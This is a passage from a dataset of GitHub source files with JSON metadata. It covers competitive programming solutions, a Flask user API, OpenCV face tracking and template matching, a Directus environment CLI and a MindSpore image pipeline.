return res\n\n\nk = int(input())\nn = int(input())\npairs = []\nfor _ in range(n):\n x, y = map(int, input().split())\n pairs.append((x, y))\n\npairs.sort(key=lambda p: p[0])\n\nout = summary(list(map(lambda p: p[0], pairs)))\n\ngroups = {}\nfor pair in pairs:\n x, y = pair[0], pair[1]\n groups[y] = groups.get(y, [])\n groups[y].append(x)\n\nfor key, group in groups.items():\n groups[key] = summary(group)\n\ninp = sum(groups.values())\n\nprint(inp)\nprint(out - inp)\n","repo_name":"priamoryki/ITMO","sub_path":"semester-6/ML/codeforces/F.py","file_name":"F.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"26542183577","text":"# SWEA 1251 하나로\n\ndef find_set(x):\n if parent[x] < 0:\n return x\n parent[x] = find_set(parent[x])\n return parent[x]\n\ndef union(x, y):\n x = find_set(x)\n y = find_set(y)\n if x == y:\n return\n if x < y:\n parent[x] += parent[y]\n parent[y] = x\n else:\n parent[y] += parent[x]\n parent[x] = y\n return\n\ndef kruskal():\n result = 0\n count = 0\n for e in range(len(edge)):\n w, x, y = edge[e]\n if find_set(x) == find_set(y):\n continue\n result += w ** 2\n union(x, y)\n count += 1\n if count == N - 1:\n break\n return result\n\nfor tc in range(1, int(input()) + 1):\n N = int(input())\n X = list(map(int, input().split()))\n Y = list(map(int, input().split()))\n E = float(input())\n edge = []\n for i in range(N - 1):\n for j in range(i + 1, N):\n x = (X[i] - X[j]) ** 2\n y = (Y[i] - Y[j]) ** 2\n w = (x + y) ** 0.5\n edge.append([w, i, j])\n edge.sort(key = lambda x: x[0])\n parent = [-1] * N\n print(f'#{tc} {(int((kruskal() * E) + 0.5))}')","repo_name":"do-park/swexpertacademy","sub_path":"problem/2006/1251.py","file_name":"1251.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31384476702","text":"from __future__ import print_function, unicode_literals\nfrom PyInquirer import prompt\nimport subprocess\nimport sys, os\nimport re\nfrom Questions import EnvQuestions, PjQuestions\nfrom engine.Validations import EnvValidations\nfrom engine.Validations import ValidationHelper\nfrom engine.Environments import Environments\nfrom engine.Environment import Environment\nfrom engine.Project import Project\nfrom engine.Migration import Migration\nfrom utils import GeneralHelper\nmodule_options = ['<== 
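The hand-rolled correlation loops above are O(H*W*h*w) in pure Python; OpenCV computes the same normalized statistic vectorized, and `minMaxLoc` replaces the `np.unravel_index(argmax)` step. A sketch assuming the record's grayscale inputs:

import cv2

image_grey = cv2.imread("images/shelf.jpg", 0)
temp_grey = cv2.imread("images/template.jpg", 0)

# TM_CCOEFF_NORMED subtracts patch/template means and divides by their norms,
# which is the statistic normalized_cross_correlation computes by hand.
res = cv2.matchTemplate(image_grey, temp_grey, cv2.TM_CCOEFF_NORMED)
_, max_val, _, max_loc = cv2.minMaxLoc(res)
x, y = max_loc   # top-left corner of the best match
print(x, y, max_val)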
BACK']\n\n\nclass CommandEnv:\n\n def __init__(self):\n self.envs = None\n self.env = None\n self.main()\n\n def main(self):\n self.envs = Environments()\n self.envs.load()\n if len(self.envs.items) > 0:\n options = ['load', 'create', 'delete', 'reset']\n if Migration.get_migrations():\n options = options + ['download migrations']\n options = options + ['cancel']\n EnvQuestions.introduction[0]['choices'] = options\n\n task_data = prompt(EnvQuestions.introduction)\n try:\n self.interface(task_data)\n except KeyboardInterrupt:\n print('\\n')\n close_data = prompt(EnvQuestions.close)\n try:\n ValidationHelper.check_answers(close_data)\n action = close_data['close_action']\n print(action)\n if action == 'back to main options':\n return self.main()\n else:\n sys.exit(1)\n except KeyboardInterrupt:\n sys.exit(1)\n\n def interface(self, task_data):\n if not task_data:\n raise KeyboardInterrupt\n task = task_data['task']\n if task == 'load':\n self.load()\n CommandPj(Environment(self.env))\n elif task == 'create':\n self.create()\n CommandPj(Environment(self.env))\n elif task == 'delete':\n self.delete()\n elif task == 'reset':\n self.reset()\n elif task == 'download migrations':\n self.download_migrations()\n else:\n sys.exit(1)\n\n def load(self):\n print(self.envs.get())\n if len(self.envs.items) > 0:\n options = map(lambda d: d['ref'], self.envs.items)\n EnvQuestions.load[0]['choices'] = list(options) + [module_options[0]]\n load_data = prompt(EnvQuestions.load)\n ValidationHelper.check_answers(load_data)\n if load_data['env_ref'] == module_options[0]:\n return self.main()\n self.env = load_data['env_ref']\n\n def create(self):\n path = self.check_directus_dir()\n install_data = prompt(EnvQuestions.create)\n ValidationHelper.check_answers(install_data)\n db_user, db_pw = self.get_db_details()\n ref_name = re.sub('[\\W_]+', '', install_data['install_name'])\n env = Environment(\n ref_name=ref_name,\n name=install_data['install_name'],\n path=path,\n db_user=db_user,\n db_pw=db_pw\n )\n self.envs.add(env)\n self.env = ref_name\n\n def delete(self):\n q = EnvQuestions.delete\n q[0]['choices'] = [item['ref'] for item in self.envs.items] + [module_options[0]]\n ref_name = prompt(q[0])['ref_name']\n if ref_name == module_options[0]:\n return self.main()\n delete_data = prompt([q[1], q[2]])\n if delete_data['confirmation']:\n env = Environment(ref_name=ref_name)\n env.delete(keep_db=delete_data['keep_db'])\n self.envs.clear_env(ref_name=ref_name)\n return self.main()\n\n def reset(self):\n reset_data = prompt(EnvQuestions.reset)\n if reset_data['confirmation']:\n for item in self.envs.items:\n env = Environment(ref_name=item['ref'])\n env.delete(keep_db=reset_data['keep_db'])\n self.envs.clear_env(ref_name=item['ref'])\n self.envs.reset()\n self.__init__()\n\n def download_migrations(self):\n path = GeneralHelper.prepare_path(self.check_output_dir())\n Migration.download_migrations(out_dir=path)\n\n @staticmethod\n def get_db_details():\n while True:\n db_data = prompt(EnvQuestions.env_db)\n if EnvValidations.validate_db_connection(\n username=db_data['username'],\n password=db_data['password']\n ):\n break\n return db_data['username'], db_data['password']\n\n @staticmethod\n def check_directus_dir():\n while True:\n os.system(\"bash shell/directoryFinder.sh\")\n path = GeneralHelper.prepare_path(open(\"data/tmp/directusEnv.txt\").read())\n os.remove(\"data/tmp/directusEnv.txt\")\n if EnvValidations.validate_unique_path(path):\n break\n else:\n print(\"\\nX Path not unique, try again...\")\n return 
path\n\n @staticmethod\n def check_output_dir():\n while True:\n subprocess.run(\"bash shell/outputFinder.sh\", shell=True)\n path = open(\"data/tmp/outPath.txt\").read()\n os.remove(\"data/tmp/outPath.txt\")\n if EnvValidations.validate_unique_path(path):\n break\n else:\n print(\"\\nX Path not unique, try again...\")\n return path\n\nclass CommandPj:\n\n def __init__(self, env):\n self.env = env\n self.pj = None\n self.main()\n\n def main(self):\n print(self.env.ouput())\n self.env.load_projects()\n choices = ['create project', 'link project to database']\n if len(self.env.projects) > 0:\n choices = ['create project', 'project settings','link project to database']\n PjQuestions.introduction[0]['choices'] = choices + [module_options[0]]\n intro_data = prompt(PjQuestions.introduction)\n try:\n ValidationHelper.check_answers(intro_data)\n self.interface(intro_data)\n except KeyboardInterrupt:\n print('\\n')\n close_data = prompt(PjQuestions.close)\n try:\n ValidationHelper.check_answers(close_data)\n action = close_data['close_action']\n print(action)\n if action == 'back to environment options':\n return self.main()\n else:\n sys.exit(1)\n except KeyboardInterrupt:\n sys.exit(1)\n\n def interface(self, intro_data):\n if intro_data['task'] == module_options[0]:\n return CommandEnv()\n elif intro_data['task'] == 'create project':\n self.create()\n elif intro_data['task'] == 'project settings':\n self.project_settings()\n elif intro_data['task'] == 'link project to database':\n self.link_project()\n\n def create(self):\n migration_file=None\n if len(Migration.get_migrations()) > 0:\n migration_data = prompt(PjQuestions.migrations[0])\n ValidationHelper.check_answers(migration_data)\n if migration_data['use_migration']:\n PjQuestions.migrations[1]['choices'] = Migration.get_migrations()\n migration_file = prompt(PjQuestions.migrations[1])['migration_file']\n install_data = prompt(PjQuestions.create)\n ValidationHelper.check_answers(install_data)\n self.pj = Project(\n ref=install_data['install_ref'],\n name=install_data['install_name']\n )\n self.env.add_project(\n project=self.pj,\n migration_file=migration_file\n )\n self.main()\n\n def project_settings(self):\n PjQuestions.select_project[0]['choices'] = map(lambda d: d['ref'], self.env.projects)\n ref_data = prompt(PjQuestions.select_project)\n ValidationHelper.check_answers(ref_data)\n\n self.pj = Project(ref=ref_data['pj_ref'])\n pj_task = prompt(PjQuestions.project_task)['pj_task']\n ValidationHelper.check_answers(pj_task)\n if pj_task == 'delete project':\n self.delete()\n elif pj_task == 'templatify project database':\n self.templatify()\n\n def link_project(self):\n databases = self.env.list_dbs()\n PjQuestions.link[0]['choices'] = databases\n link_data = prompt(PjQuestions.link)\n ValidationHelper.check_answers(link_data)\n self.env.link_project(\n project=Project(\n ref=link_data['install_ref'],\n name=link_data['install_name'],\n database=link_data['database_name'])\n )\n self.main()\n\n def delete(self):\n delete_tasks = prompt(PjQuestions.delete)\n ValidationHelper.check_answers(delete_tasks)\n keep_db = delete_tasks['keep_db']\n confirmation = delete_tasks['confirmation']\n if confirmation:\n self.env.delete_project(\n project=self.pj,\n keep_db=keep_db\n )\n self.main()\n\n def templatify(self):\n pj_data = self.env.get_project(self.pj.ref_name)\n print(pj_data)\n ValidationHelper.check_answers(pj_data)\n self.pj = Project(\n ref=pj_data['ref'],\n name=pj_data['name'],\n database=pj_data['database']\n )\n 
self.env.templatify_project(self.pj)\n self.main()\n\n\n\nif __name__ == '__main__':\n CommandEnv()\n # CommandPj(Environment('testenv'))\n","repo_name":"LUMC/directus-manager","sub_path":"Command.py","file_name":"Command.py","file_ext":"py","file_size_in_byte":9566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70632830312","text":"import argparse\nimport cv2\nimport random\nimport time\n\ndef main():\n i = 0\n parser = argparse.ArgumentParser(description='Detect face in video or webcam')\n parser.add_argument('--video', help='Video source')\n parser.add_argument('--out', help='Output video path')\n parser.add_argument('--skipframe', nargs='?', const=True, \n help='Skip frame when do not keep up frames of video')\n parser.add_argument('--waitframe', nargs='?', const=True, \n help='Wait frame when process faster frames of video')\n args = parser.parse_args()\n is_skipframe = args.skipframe\n is_waitframe = args.waitframe\n output_path = args.out\n if args.video is not None:\n capture = cv2.VideoCapture(args.video)\n else:\n capture = cv2.VideoCapture(0)\n face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n height_orig = capture.get(cv2.CAP_PROP_FRAME_HEIGHT)\n width_orig = capture.get(cv2.CAP_PROP_FRAME_WIDTH)\n frame_duration = 1/capture.get(cv2.CAP_PROP_FPS)\n #The deisred output width and height\n width = 600\n scale = width/width_orig\n rectangle_color = (0,165,255)\n face_tracker = {}\n frame_counter = 0\n face_count = 0\n skip_frame = 0\n base_tracker = cv2.TrackerKCF_create\n # base_tracker = cv2.TrackerMOSSE_create\n output_size = (775, 600)\n if output_path is not None:\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(output_path,fourcc, 1/frame_duration, output_size)\n while capture.isOpened():\n #Retrieve the latest image from the webcam\n start_frame_time = time.time()\n rc,full_size_base_image = capture.read()\n if skip_frame > 0:\n skip_frame -= 1\n continue\n frame_counter += 1\n #Resize the image to 640x480\n base_image = cv2.resize(full_size_base_image, None, fx=scale, fy=scale)\n pressed_key = cv2.waitKey(2)\n if pressed_key == ord('q'):\n capture.release()\n cv2.destroyAllWindows()\n exit(0)\n result_image = base_image.copy()\n gray = cv2.cvtColor(base_image, cv2.COLOR_BGR2GRAY)\n # gray = cv2.cvtColor(full_size_base_image, cv2.COLOR_BGR2GRAY)\n\n tracker_to_del = []\n bboxes = []\n for fid in face_tracker.keys():\n ok, bbox = face_tracker[fid].update(base_image)\n if ok:\n bboxes.append((fid, bbox))\n else:\n tracker_to_del.append(fid)\n for fid in tracker_to_del:\n del face_tracker[fid]\n \n # scale factor = 1.3: Parameter specifying how much the image size is reduced at each image scale.\n # minNeighbors = 5 Parameter specifying how many neighbors each candidate rectangle\n # should have to retain it.\n if frame_counter % 3 == 0:\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n for x, y, w, h in faces:\n x_center = x + 0.5*w\n y_center = y + 0.5*h\n fid_match = None\n for fid, bbox in bboxes:\n x_tracked, y_tracked, w_tracked, h_tracked = bbox\n x_center_tracked = x_tracked + 0.5*w_tracked\n y_center_tracked = y_tracked + 0.5*h_tracked\n if x_tracked < x_center < x_tracked + w_tracked \\\n and y_tracked < y_center < y_tracked + h_tracked \\\n and x < x_center_tracked < x + w \\\n and y < y_center_tracked < y + h:\n fid_match = fid\n break\n if fid_match is None:\n new_tracker = base_tracker()\n new_tracker.init(base_image, (x, y, w, h))\n face_count += 
1\n face_tracker[face_count] = new_tracker\n bboxes.append((face_count, (x, y, w, h)))\n else:\n new_tracker = base_tracker()\n new_tracker.init(base_image, (x, y, w, h))\n face_tracker[fid_match] = new_tracker\n for fid, (x, y, w, h) in bboxes:\n cv2.rectangle(result_image, (int(x), int(y)), (int(x + w), int(y + h)), rectangle_color, 2)\n if pressed_key == ord('f'):\n i += 1\n cv2.imwrite('./fail_detect/img_{}.jpg'.format(i), full_size_base_image)\n cv2.imwrite('./fail_detect/img_{}_fail.jpg'.format(i), result_image)\n print('fail saved')\n large_result = cv2.resize(result_image, output_size)\n\n #Finally, we want to show the images on the screen\n # cv2.imshow(\"base-image\", base_image)\n cv2.imshow(\"video\", large_result)\n end_frame_time = time.time()\n process_time = end_frame_time - start_frame_time\n if process_time < frame_duration:\n if is_waitframe:\n time.sleep(frame_duration - process_time)\n elif is_skipframe:\n is_skipframe = int(process_time/frame_duration) - 1\n if output_path is not None:\n out.write(large_result)\nif __name__ == '__main__':\n main()","repo_name":"dangvu5998/Face-detection-tracking","sub_path":"face_detection_tracking.py","file_name":"face_detection_tracking.py","file_ext":"py","file_size_in_byte":5197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1710255396","text":"import yaml\nfrom grafanalib.core import (\n Alert, AlertCondition, Dashboard, Graph,\n GreaterThan, OP_AND, OPS_FORMAT, Row, Column, RTYPE_SUM, SECONDS_FORMAT,\n SHORT_FORMAT, single_y_axis, Target, TimeRange, YAxes, YAxis\n)\n\nnodes=[]\n\nwith open(\"nodelist.yaml\", 'r') as stream:\n nodes = yaml.safe_load(stream)\n\ndashboard = Dashboard(\n title=\"Agents\",\n uid=__file__.split('/')[-1:][0].replace('.py', ''),\n rows=[\n Row(panels=[\n Graph(\n title=\"{}\".format(i),\n dataSource='Prometheus',\n targets=[\n Target(\n expr='process_resident_memory_bytes{{job=\"all\",instance=\"{}\"}}'.format(i),\n refId='A',\n ),\n ],\n )\n ]) for i in nodes\n ],\n).auto_panel_ids()\n","repo_name":"btwiuse/k0s","sub_path":"grafana/panels/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"21994956290","text":"# ***Greedily Increasing Subsequence Solution***\n# Difficulty: 2.0\n# Time Limit: 5 seconds, Memory Limit: 1024 MB\n# CPU Time: 0.33 s\n# Author: Johan Sannemo\n# Source: HiQ Challenge 2017\n# Link: https://open.kattis.com/problems/greedilyincreasing\n\n\nn = int(input())\nnums = list(map(int, input().split()))\ngis = [nums[0]]\nfor i in range(1, n):\n if nums[i] > gis[-1]:\n gis.append(nums[i])\nprint(len(gis))\nprint(\" \".join([str(x) for x in gis]))\n","repo_name":"ahmedsiad/kattis-solutions","sub_path":"greedilyincreasing/greedilyincreasing.py","file_name":"greedilyincreasing.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26833211898","text":"import sqlite3\nfrom typing import List\n\nfrom malory.classes.room import Room\nfrom malory.orm.active_unit_orm import get_player\nfrom malory.orm.user_orm import get_user_name\nfrom settings import DB_LOCATION\n\n\ndef get_available_rooms() -> List[Room]:\n \"\"\"Returns all rooms that can be joined to\"\"\"\n with sqlite3.connect(DB_LOCATION) as conn:\n c = conn.cursor()\n c.execute(\"SELECT name, points, player1_id FROM rooms WHERE player2_id IS 
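Isolated sketch of the association rule the tracking loop above uses to match Haar detections to existing KCF trackers: a detection and a tracked box are paired only when each box contains the other's center. Boxes are (x, y, w, h); the values are illustrative.

def centers_match(det, tracked):
    x, y, w, h = det
    xt, yt, wt, ht = tracked
    cx, cy = x + 0.5 * w, y + 0.5 * h        # detection center
    cxt, cyt = xt + 0.5 * wt, yt + 0.5 * ht  # tracked-box center
    return (xt < cx < xt + wt and yt < cy < yt + ht
            and x < cxt < x + w and y < cyt < y + h)

print(centers_match((10, 10, 40, 40), (20, 15, 40, 45)))    # True: mutual containment
print(centers_match((10, 10, 20, 20), (100, 100, 20, 20)))  # False: disjoint boxes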
NULL\")\n lst = c.fetchall()\n return [Room(name, points, get_player(get_user_name(idx))) for (name, points, idx) in lst]\n\n\ndef get_room(room_name: str) -> Room:\n \"\"\"Returns a room by name, throwing AttributeError if not found\"\"\"\n with sqlite3.connect(DB_LOCATION) as conn:\n c = conn.cursor()\n c.execute(\"SELECT name, points, player1_id, player2_id FROM rooms WHERE name = ?\", (room_name,))\n tup = c.fetchone()\n if not tup:\n raise AttributeError(f\"Room {room_name} was not found\")\n name, points, player1_id, player2_id = tup\n player1 = get_player(get_user_name(player1_id))\n player2 = None if player2_id is None else get_player(get_user_name(player2_id))\n return Room(name, points, player1, player2)\n\n\ndef join_room(room_name: str, idx: int) -> None:\n \"\"\"Adds a player to a room, throwing AttributeError if room is full or not found\"\"\"\n with sqlite3.connect(DB_LOCATION) as conn:\n username = get_user_name(idx)\n room = get_room(room_name)\n if not not room.player2:\n raise AttributeError(\"Room is full\")\n if room.player1.idx == idx:\n raise AttributeError(f\"Player {username} is already in room {room.name}\")\n conn.execute(\"UPDATE rooms SET player2_id=? WHERE name=?\", (idx, room_name))\n conn.commit()\n\n\ndef create_room(room_name: str, points: int, idx: int) -> None:\n \"\"\"Creates a room in the database\"\"\"\n with sqlite3.connect(DB_LOCATION) as conn:\n get_user_name(idx)\n try:\n conn.execute(\"INSERT INTO rooms(name, points, player1_id) VALUES(?,?,?)\", (room_name, points, idx))\n conn.commit()\n except sqlite3.IntegrityError:\n raise AttributeError(f\"Room name {room_name} is already taken\")\n\n\ndef leave_room(room_name: str, idx: int) -> None:\n \"\"\"Removes a player from a room, throwing AttributeError if not in room\"\"\"\n with sqlite3.connect(DB_LOCATION) as conn:\n username = get_user_name(idx)\n room = get_room(room_name)\n if room.player1.idx == idx:\n conn.execute(\"DELETE FROM rooms WHERE name=?\", (room_name,))\n conn.commit()\n if room.player2:\n create_room(room.name, room.points, room.player2.idx)\n elif room.player2 and room.player2.idx == idx:\n conn.execute(\"UPDATE rooms SET player2_id=NULL WHERE name=?\", (room_name,))\n conn.commit()\n else:\n raise AttributeError(f\"Player {username} is not in room named {room.name}\")\n","repo_name":"ItayElf/Malory-backend","sub_path":"malory/orm/room_orm.py","file_name":"room_orm.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44304931454","text":"'''\n@author: xky\n'''\nfrom .lexer import *\nfrom .Token import Token, TokenType\nfrom .Keyword import KEYWORD_MAP\nfrom .punc import SINGLE_PUNC_MAP\nfrom config import *\n\n\ndef gen_tokens(input_c_file=''):\n tokens_txt=''\n # 清洗数据转换为想要的表达式\n with open(input_c_file, encoding='utf8') as c_file:\n lexer = Lexer(c_file.read())\n with open(token_file, mode='w', encoding='utf8') as tokens_file:\n for token in lexer.lex():\n tokens_file.write(str(token) + '\\n')\n tokens_txt+=(str(token) + '\\n')\n return tokens_txt\n\ndef gen_input_str():\n input_str1 = ''\n source_str = ''\n with open(token_file, mode='r', encoding='utf8') as tokens_file:\n for line in tokens_file.readlines():\n line = line.strip('\\n')\n token = int(line.split(', ')[0])\n word = line.split(', ')[1]\n # 跳过注释和分号\n if word == ';' or token == TokenType.Comment:\n continue\n elif word in KEYWORD_MAP.keys():\n # 关键字KEYWORD_MAP,if,return,int\n if word == 'if':\n input_str1 += 'i'\n 
elif word == 'return':\n input_str1 += 'r'\n else:\n input_str1 += 'k'\n # 变量名 Identifier\n elif token == TokenType.Identifier[0]:\n if word == 'main':\n input_str1 += 'm'\n else:\n input_str1 += 'v'\n # 变量名 符号栈\n elif word in SINGLE_PUNC_MAP.keys():\n input_str1 += word\n elif token == TokenType.NumericLiteral[0]:\n input_str1 += 'd'\n source_str += ' ' + word\n source_str = source_str.strip()\n input_str1 += '#'\n # , 如果是cmp,<,>符号就变为c。\n # input_str1=input_str1.replace('<','c')\n print(source_str)\n print(input_str1)\n with open(input_str_file, mode='w', encoding='utf8') as f:\n f.write(input_str1)\n with open(input_source_file, mode='w', encoding='utf8') as f:\n f.write(source_str)\n","repo_name":"wscjxky/zuoye","sub_path":"compiler/lab06/lexer/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26801257387","text":"from flask import jsonify, url_for, request, g, abort\nfrom app import db\nfrom app.models import Usuario\nfrom app.api.v1 import bp\nfrom app.api.v1.errores import peticion_erronea\nfrom app.api.v1.auth import token_auth\nfrom app.api.v1.firebase import Firebase\n\n\n\n'''\n End point: Obtener usuario\n @param: URL => idUsuario, id del usuario.\n @return: Response => datos del usuario en formato JSON.\n'''\n@bp.route('/usuarios/', methods=['GET'])\n@token_auth.login_required\ndef obtener_usuario(idUsuario):\n return jsonify(Usuario.query.get_or_404(idUsuario).to_dict())\n\n\n'''\n End point: Crear usuario.\n @param: Body => datos del usuario a crear en formato JSON.\n @return: Response => datos del usuario creado en formato JSON.\n'''\n@bp.route('/usuarios', methods=['POST'])\ndef crear_usuario():\n datos = request.get_json() or {}\n if 'correo' not in datos or 'alias' not in datos or 'contrasena' not in datos:\n return peticion_erronea('Debe incluir los campos correo electrónico, contraseña y alias.')\n if Usuario.query.filter_by(correo=datos['correo']).first():\n return peticion_erronea('Ya hay un usuario con esa dirección correo de correo electrónico, por favor utilice una dirección de correo electrónico diferente.')\n datos['idUsuario'] = Firebase.firebase_crear_usuario(datos)\n usuario = Usuario()\n usuario.from_dict(datos, nuevo_usuario=True)\n db.session.add(usuario)\n db.session.commit()\n respuesta = jsonify(usuario.to_dict())\n respuesta.status_code = 201\n respuesta.headers['Location'] = url_for(\n 'api.obtener_usuario', idUsuario=usuario.idUsuario)\n return respuesta\n\n'''\n End point: Actualizar usuario.\n @param: URL => idUsuario, id del usuario.\n @param: Body => datos del usuario a actualizar en formato JSON.\n @return: Response => datos del usuario actualizado en formato JSON.\n'''\n@bp.route('/usuarios/', methods=['PUT'])\n@token_auth.login_required\ndef actualizar_usuario(idUsuario):\n if g.usuario_actual.idUsuario != idUsuario:\n abort(403)\n usuario = Usuario.query.get_or_404(idUsuario)\n datos = request.get_json() or {}\n if 'idUsuario' in datos:\n return peticion_erronea('No se puede cambiar el id del Usuario.')\n if 'correo' in datos and datos['correo'] != usuario.correo and \\\n Usuario.query.filter_by(correo=datos['correo']).first():\n return peticion_erronea('Por favor, use otra dirección de correo electrónico.')\n if 'alias' in datos and datos['alias'] != usuario.alias and \\\n Usuario.query.filter_by(alias=datos['alias']).first():\n return peticion_erronea('Por favor, use otro alias.')\n 
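Compressed restatement of the token-to-terminal mapping `gen_input_str` builds above: keywords, identifiers, and numeric literals collapse to single grammar symbols, punctuation passes through, and the stream is terminated with '#'. The token-kind names below are simplifications of the record's TokenType checks.

def to_terminal(token_kind, word):
    if word == "if":
        return "i"
    if word == "return":
        return "r"
    if token_kind == "keyword":
        return "k"
    if token_kind == "identifier":
        return "m" if word == "main" else "v"
    if token_kind == "number":
        return "d"
    return word  # punctuation passes through unchanged

tokens = [("keyword", "int"), ("identifier", "main"),
          ("punct", "("), ("punct", ")")]
print("".join(to_terminal(k, w) for k, w in tokens) + "#")  # km()#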
usuario.from_dict(datos, nuevo_usuario=False)\n Firebase.firebase_actualizar_usuario(usuario)\n db.session.commit()\n return jsonify(usuario.to_dict())\n","repo_name":"GuillermoGarcia/avispro-api","sub_path":"app/api/v1/usuarios.py","file_name":"usuarios.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12927566246","text":"import csv\nfrom sys import argv\n\ndef main():\n\n #check for correct number of arguments\n if len(argv) != 3:\n print(\"Usage: python dna.py data.csv sequence.txt\")\n\n #open files\n databaseFile = open(\"./\" + argv[1])\n dnaFile = open(\"./\" + argv[2])\n\n reader = csv.DictReader(databaseFile)\n strs = reader.fieldnames[1:]\n\n\n dna = dnaFile.read()\n dnaFile.close()\n\n dna_fingerprint = {}\n for i in strs:\n dna_fingerprint[i] = repeats(i, dna)\n\n for i in reader:\n if match(strs, dna_fingerprint, i):\n print(f\"{i['name']}\")\n databaseFile.close()\n return\n \n print(\"No match\")\n databaseFile.close()\n\ndef repeats(x, dna):\n i = 0\n while x * (i + 1) in dna:\n i += 1\n return i\n \ndef match(strs, dna_fingerprint, row):\n for i in strs:\n if dna_fingerprint[i] != int(row[i]):\n return False\n return True\n\nmain()","repo_name":"daniel19e/cs50","sub_path":"pset6/dna/dna.py","file_name":"dna.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19531357445","text":"import cv2\nimport numpy as np\nfrom problem_1_solver import Problem1Solver\nfrom problem_2_solver import Problem2Solver\nfrom problem_3_solver import Problem3Solver\nfrom problem_4_solver import Problem4Solver\nfrom problem_5_solver import Problem5Solver\n\ndirectory = 'GaitImages/'\nimg1 = cv2.imread(directory + '00000048.png')\nimg2 = cv2.imread(directory + '00000173.png')\n\n\ndef get_binaryImg_and_boundaries(img):\n binary_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n boundaries, _ = cv2.findContours(\n binary_img, mode=cv2.RETR_TREE, method=cv2.CHAIN_APPROX_SIMPLE)\n boundaries = np.array(boundaries[0])\n return binary_img, boundaries\n\n\nprint(\"solving problem 1 ... ...\")\np1 = Problem1Solver()\np1.solve(img1)\np1.solve(img2)\n\nprint(\"solving problem 2 ... ...\")\np2 = Problem2Solver()\np2.solve()\n\nprint(\"solving problem 3 ... ...\")\nbinary_img, boundaries = get_binaryImg_and_boundaries(img1)\np3 = Problem3Solver(binary_img=binary_img, boundaries=boundaries)\np3.solve()\n\nprint(\"solving problem 4 ... ...\")\nbin_img1, _ = get_binaryImg_and_boundaries(img1)\nbin_img2, _ = get_binaryImg_and_boundaries(img2)\np4 = Problem4Solver()\np4.solve(bin_img1, '00000048.png')\np4.solve(bin_img2, '00000173.png')\n\nprint(\"solving problem 5 ... 
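The `repeats` helper in the dna.py record above finds the longest consecutive run of an STR by probing ever-longer concatenations with the `in` operator; a worked example:

def repeats(x, dna):
    i = 0
    # x * (i + 1) is i + 1 back-to-back copies of the STR; the loop exits
    # once no position in dna holds a run that long.
    while x * (i + 1) in dna:
        i += 1
    return i

print(repeats("AGAT", "AAGATAGATAGATTT"))  # 3: AGAT occurs three times in a row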
...\")\np5 = Problem5Solver()\np5.solve()\n\ncv2.waitKey(0)\n","repo_name":"akabiraka/cs682_computer_vision","sub_path":"hw4/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28575358210","text":"de_dataset = ds.ImageFolderDataset(cfg.data_path,\n class_indexing={'daisy':0,'dandelion':1,'roses':2,'sunflowers':3,'tulips':4})\n\ntransform_img = CV.RandomCropDecodeResize([cfg.image_width,cfg.image_height], scale=(0.08, 1.0), ratio=(0.75, 1.333)) #改变尺寸\nhwc2chw_op = CV.HWC2CHW()\ntype_cast_op = C.TypeCast(mstype.float32)\nde_dataset = de_dataset.map(input_columns=\"image\", num_parallel_workers=8, operations=transform_img)\nde_dataset = de_dataset.map(input_columns=\"image\", operations=hwc2chw_op, num_parallel_workers=8)\nde_dataset = de_dataset.map(input_columns=\"image\", operations=type_cast_op, num_parallel_workers=8)\nde_dataset = de_dataset.shuffle(buffer_size=cfg.data_size)\n(de_train,de_test)=de_dataset.split([0.8,0.2])\n\nde_train=de_train.batch(cfg.batch_size, drop_remainder=True)\nde_train=de_train.repeat(cfg.epoch_size)\nde_test=de_test.batch(cfg.batch_size, drop_remainder=True)\nde_test=de_test.repeat(cfg.epoch_size)\nprint('训练数据集数量:',de_train.get_dataset_size()*cfg.batch_size)\nprint('测试数据集数量:',de_test.get_dataset_size()*cfg.batch_size)\n\ndata_next=de_dataset.create_dict_iterator().get_next()\nprint('通道数/图像长/宽:', data_next['image'].shape)\nprint('一张图像的标签样式:', data_next['label']) # 一共5类,用0-4的数字表达类别。\n\nplt.figure()\nplt.imshow(data_next['image'][0,...])\nplt.colorbar()\nplt.grid(False)\nplt.show()","repo_name":"Roswellii/ML_course","sub_path":"lab4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3345762037","text":"class Solution:\r\n def groupAnagrams(self, strs):\r\n dic = {}\r\n for i in strs:\r\n tmp = tuple(sorted(i))\r\n dic[tmp] = dic.get(tmp, []) + [i]\r\n res =[]\r\n for i in dic:\r\n res.append(dic[i])\r\n return res\r\n\r\n\r\nprint(Solution().groupAnagrams([\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"]))\r\n","repo_name":"Hegemony/Python-Practice","sub_path":"LeetCode practice/Top 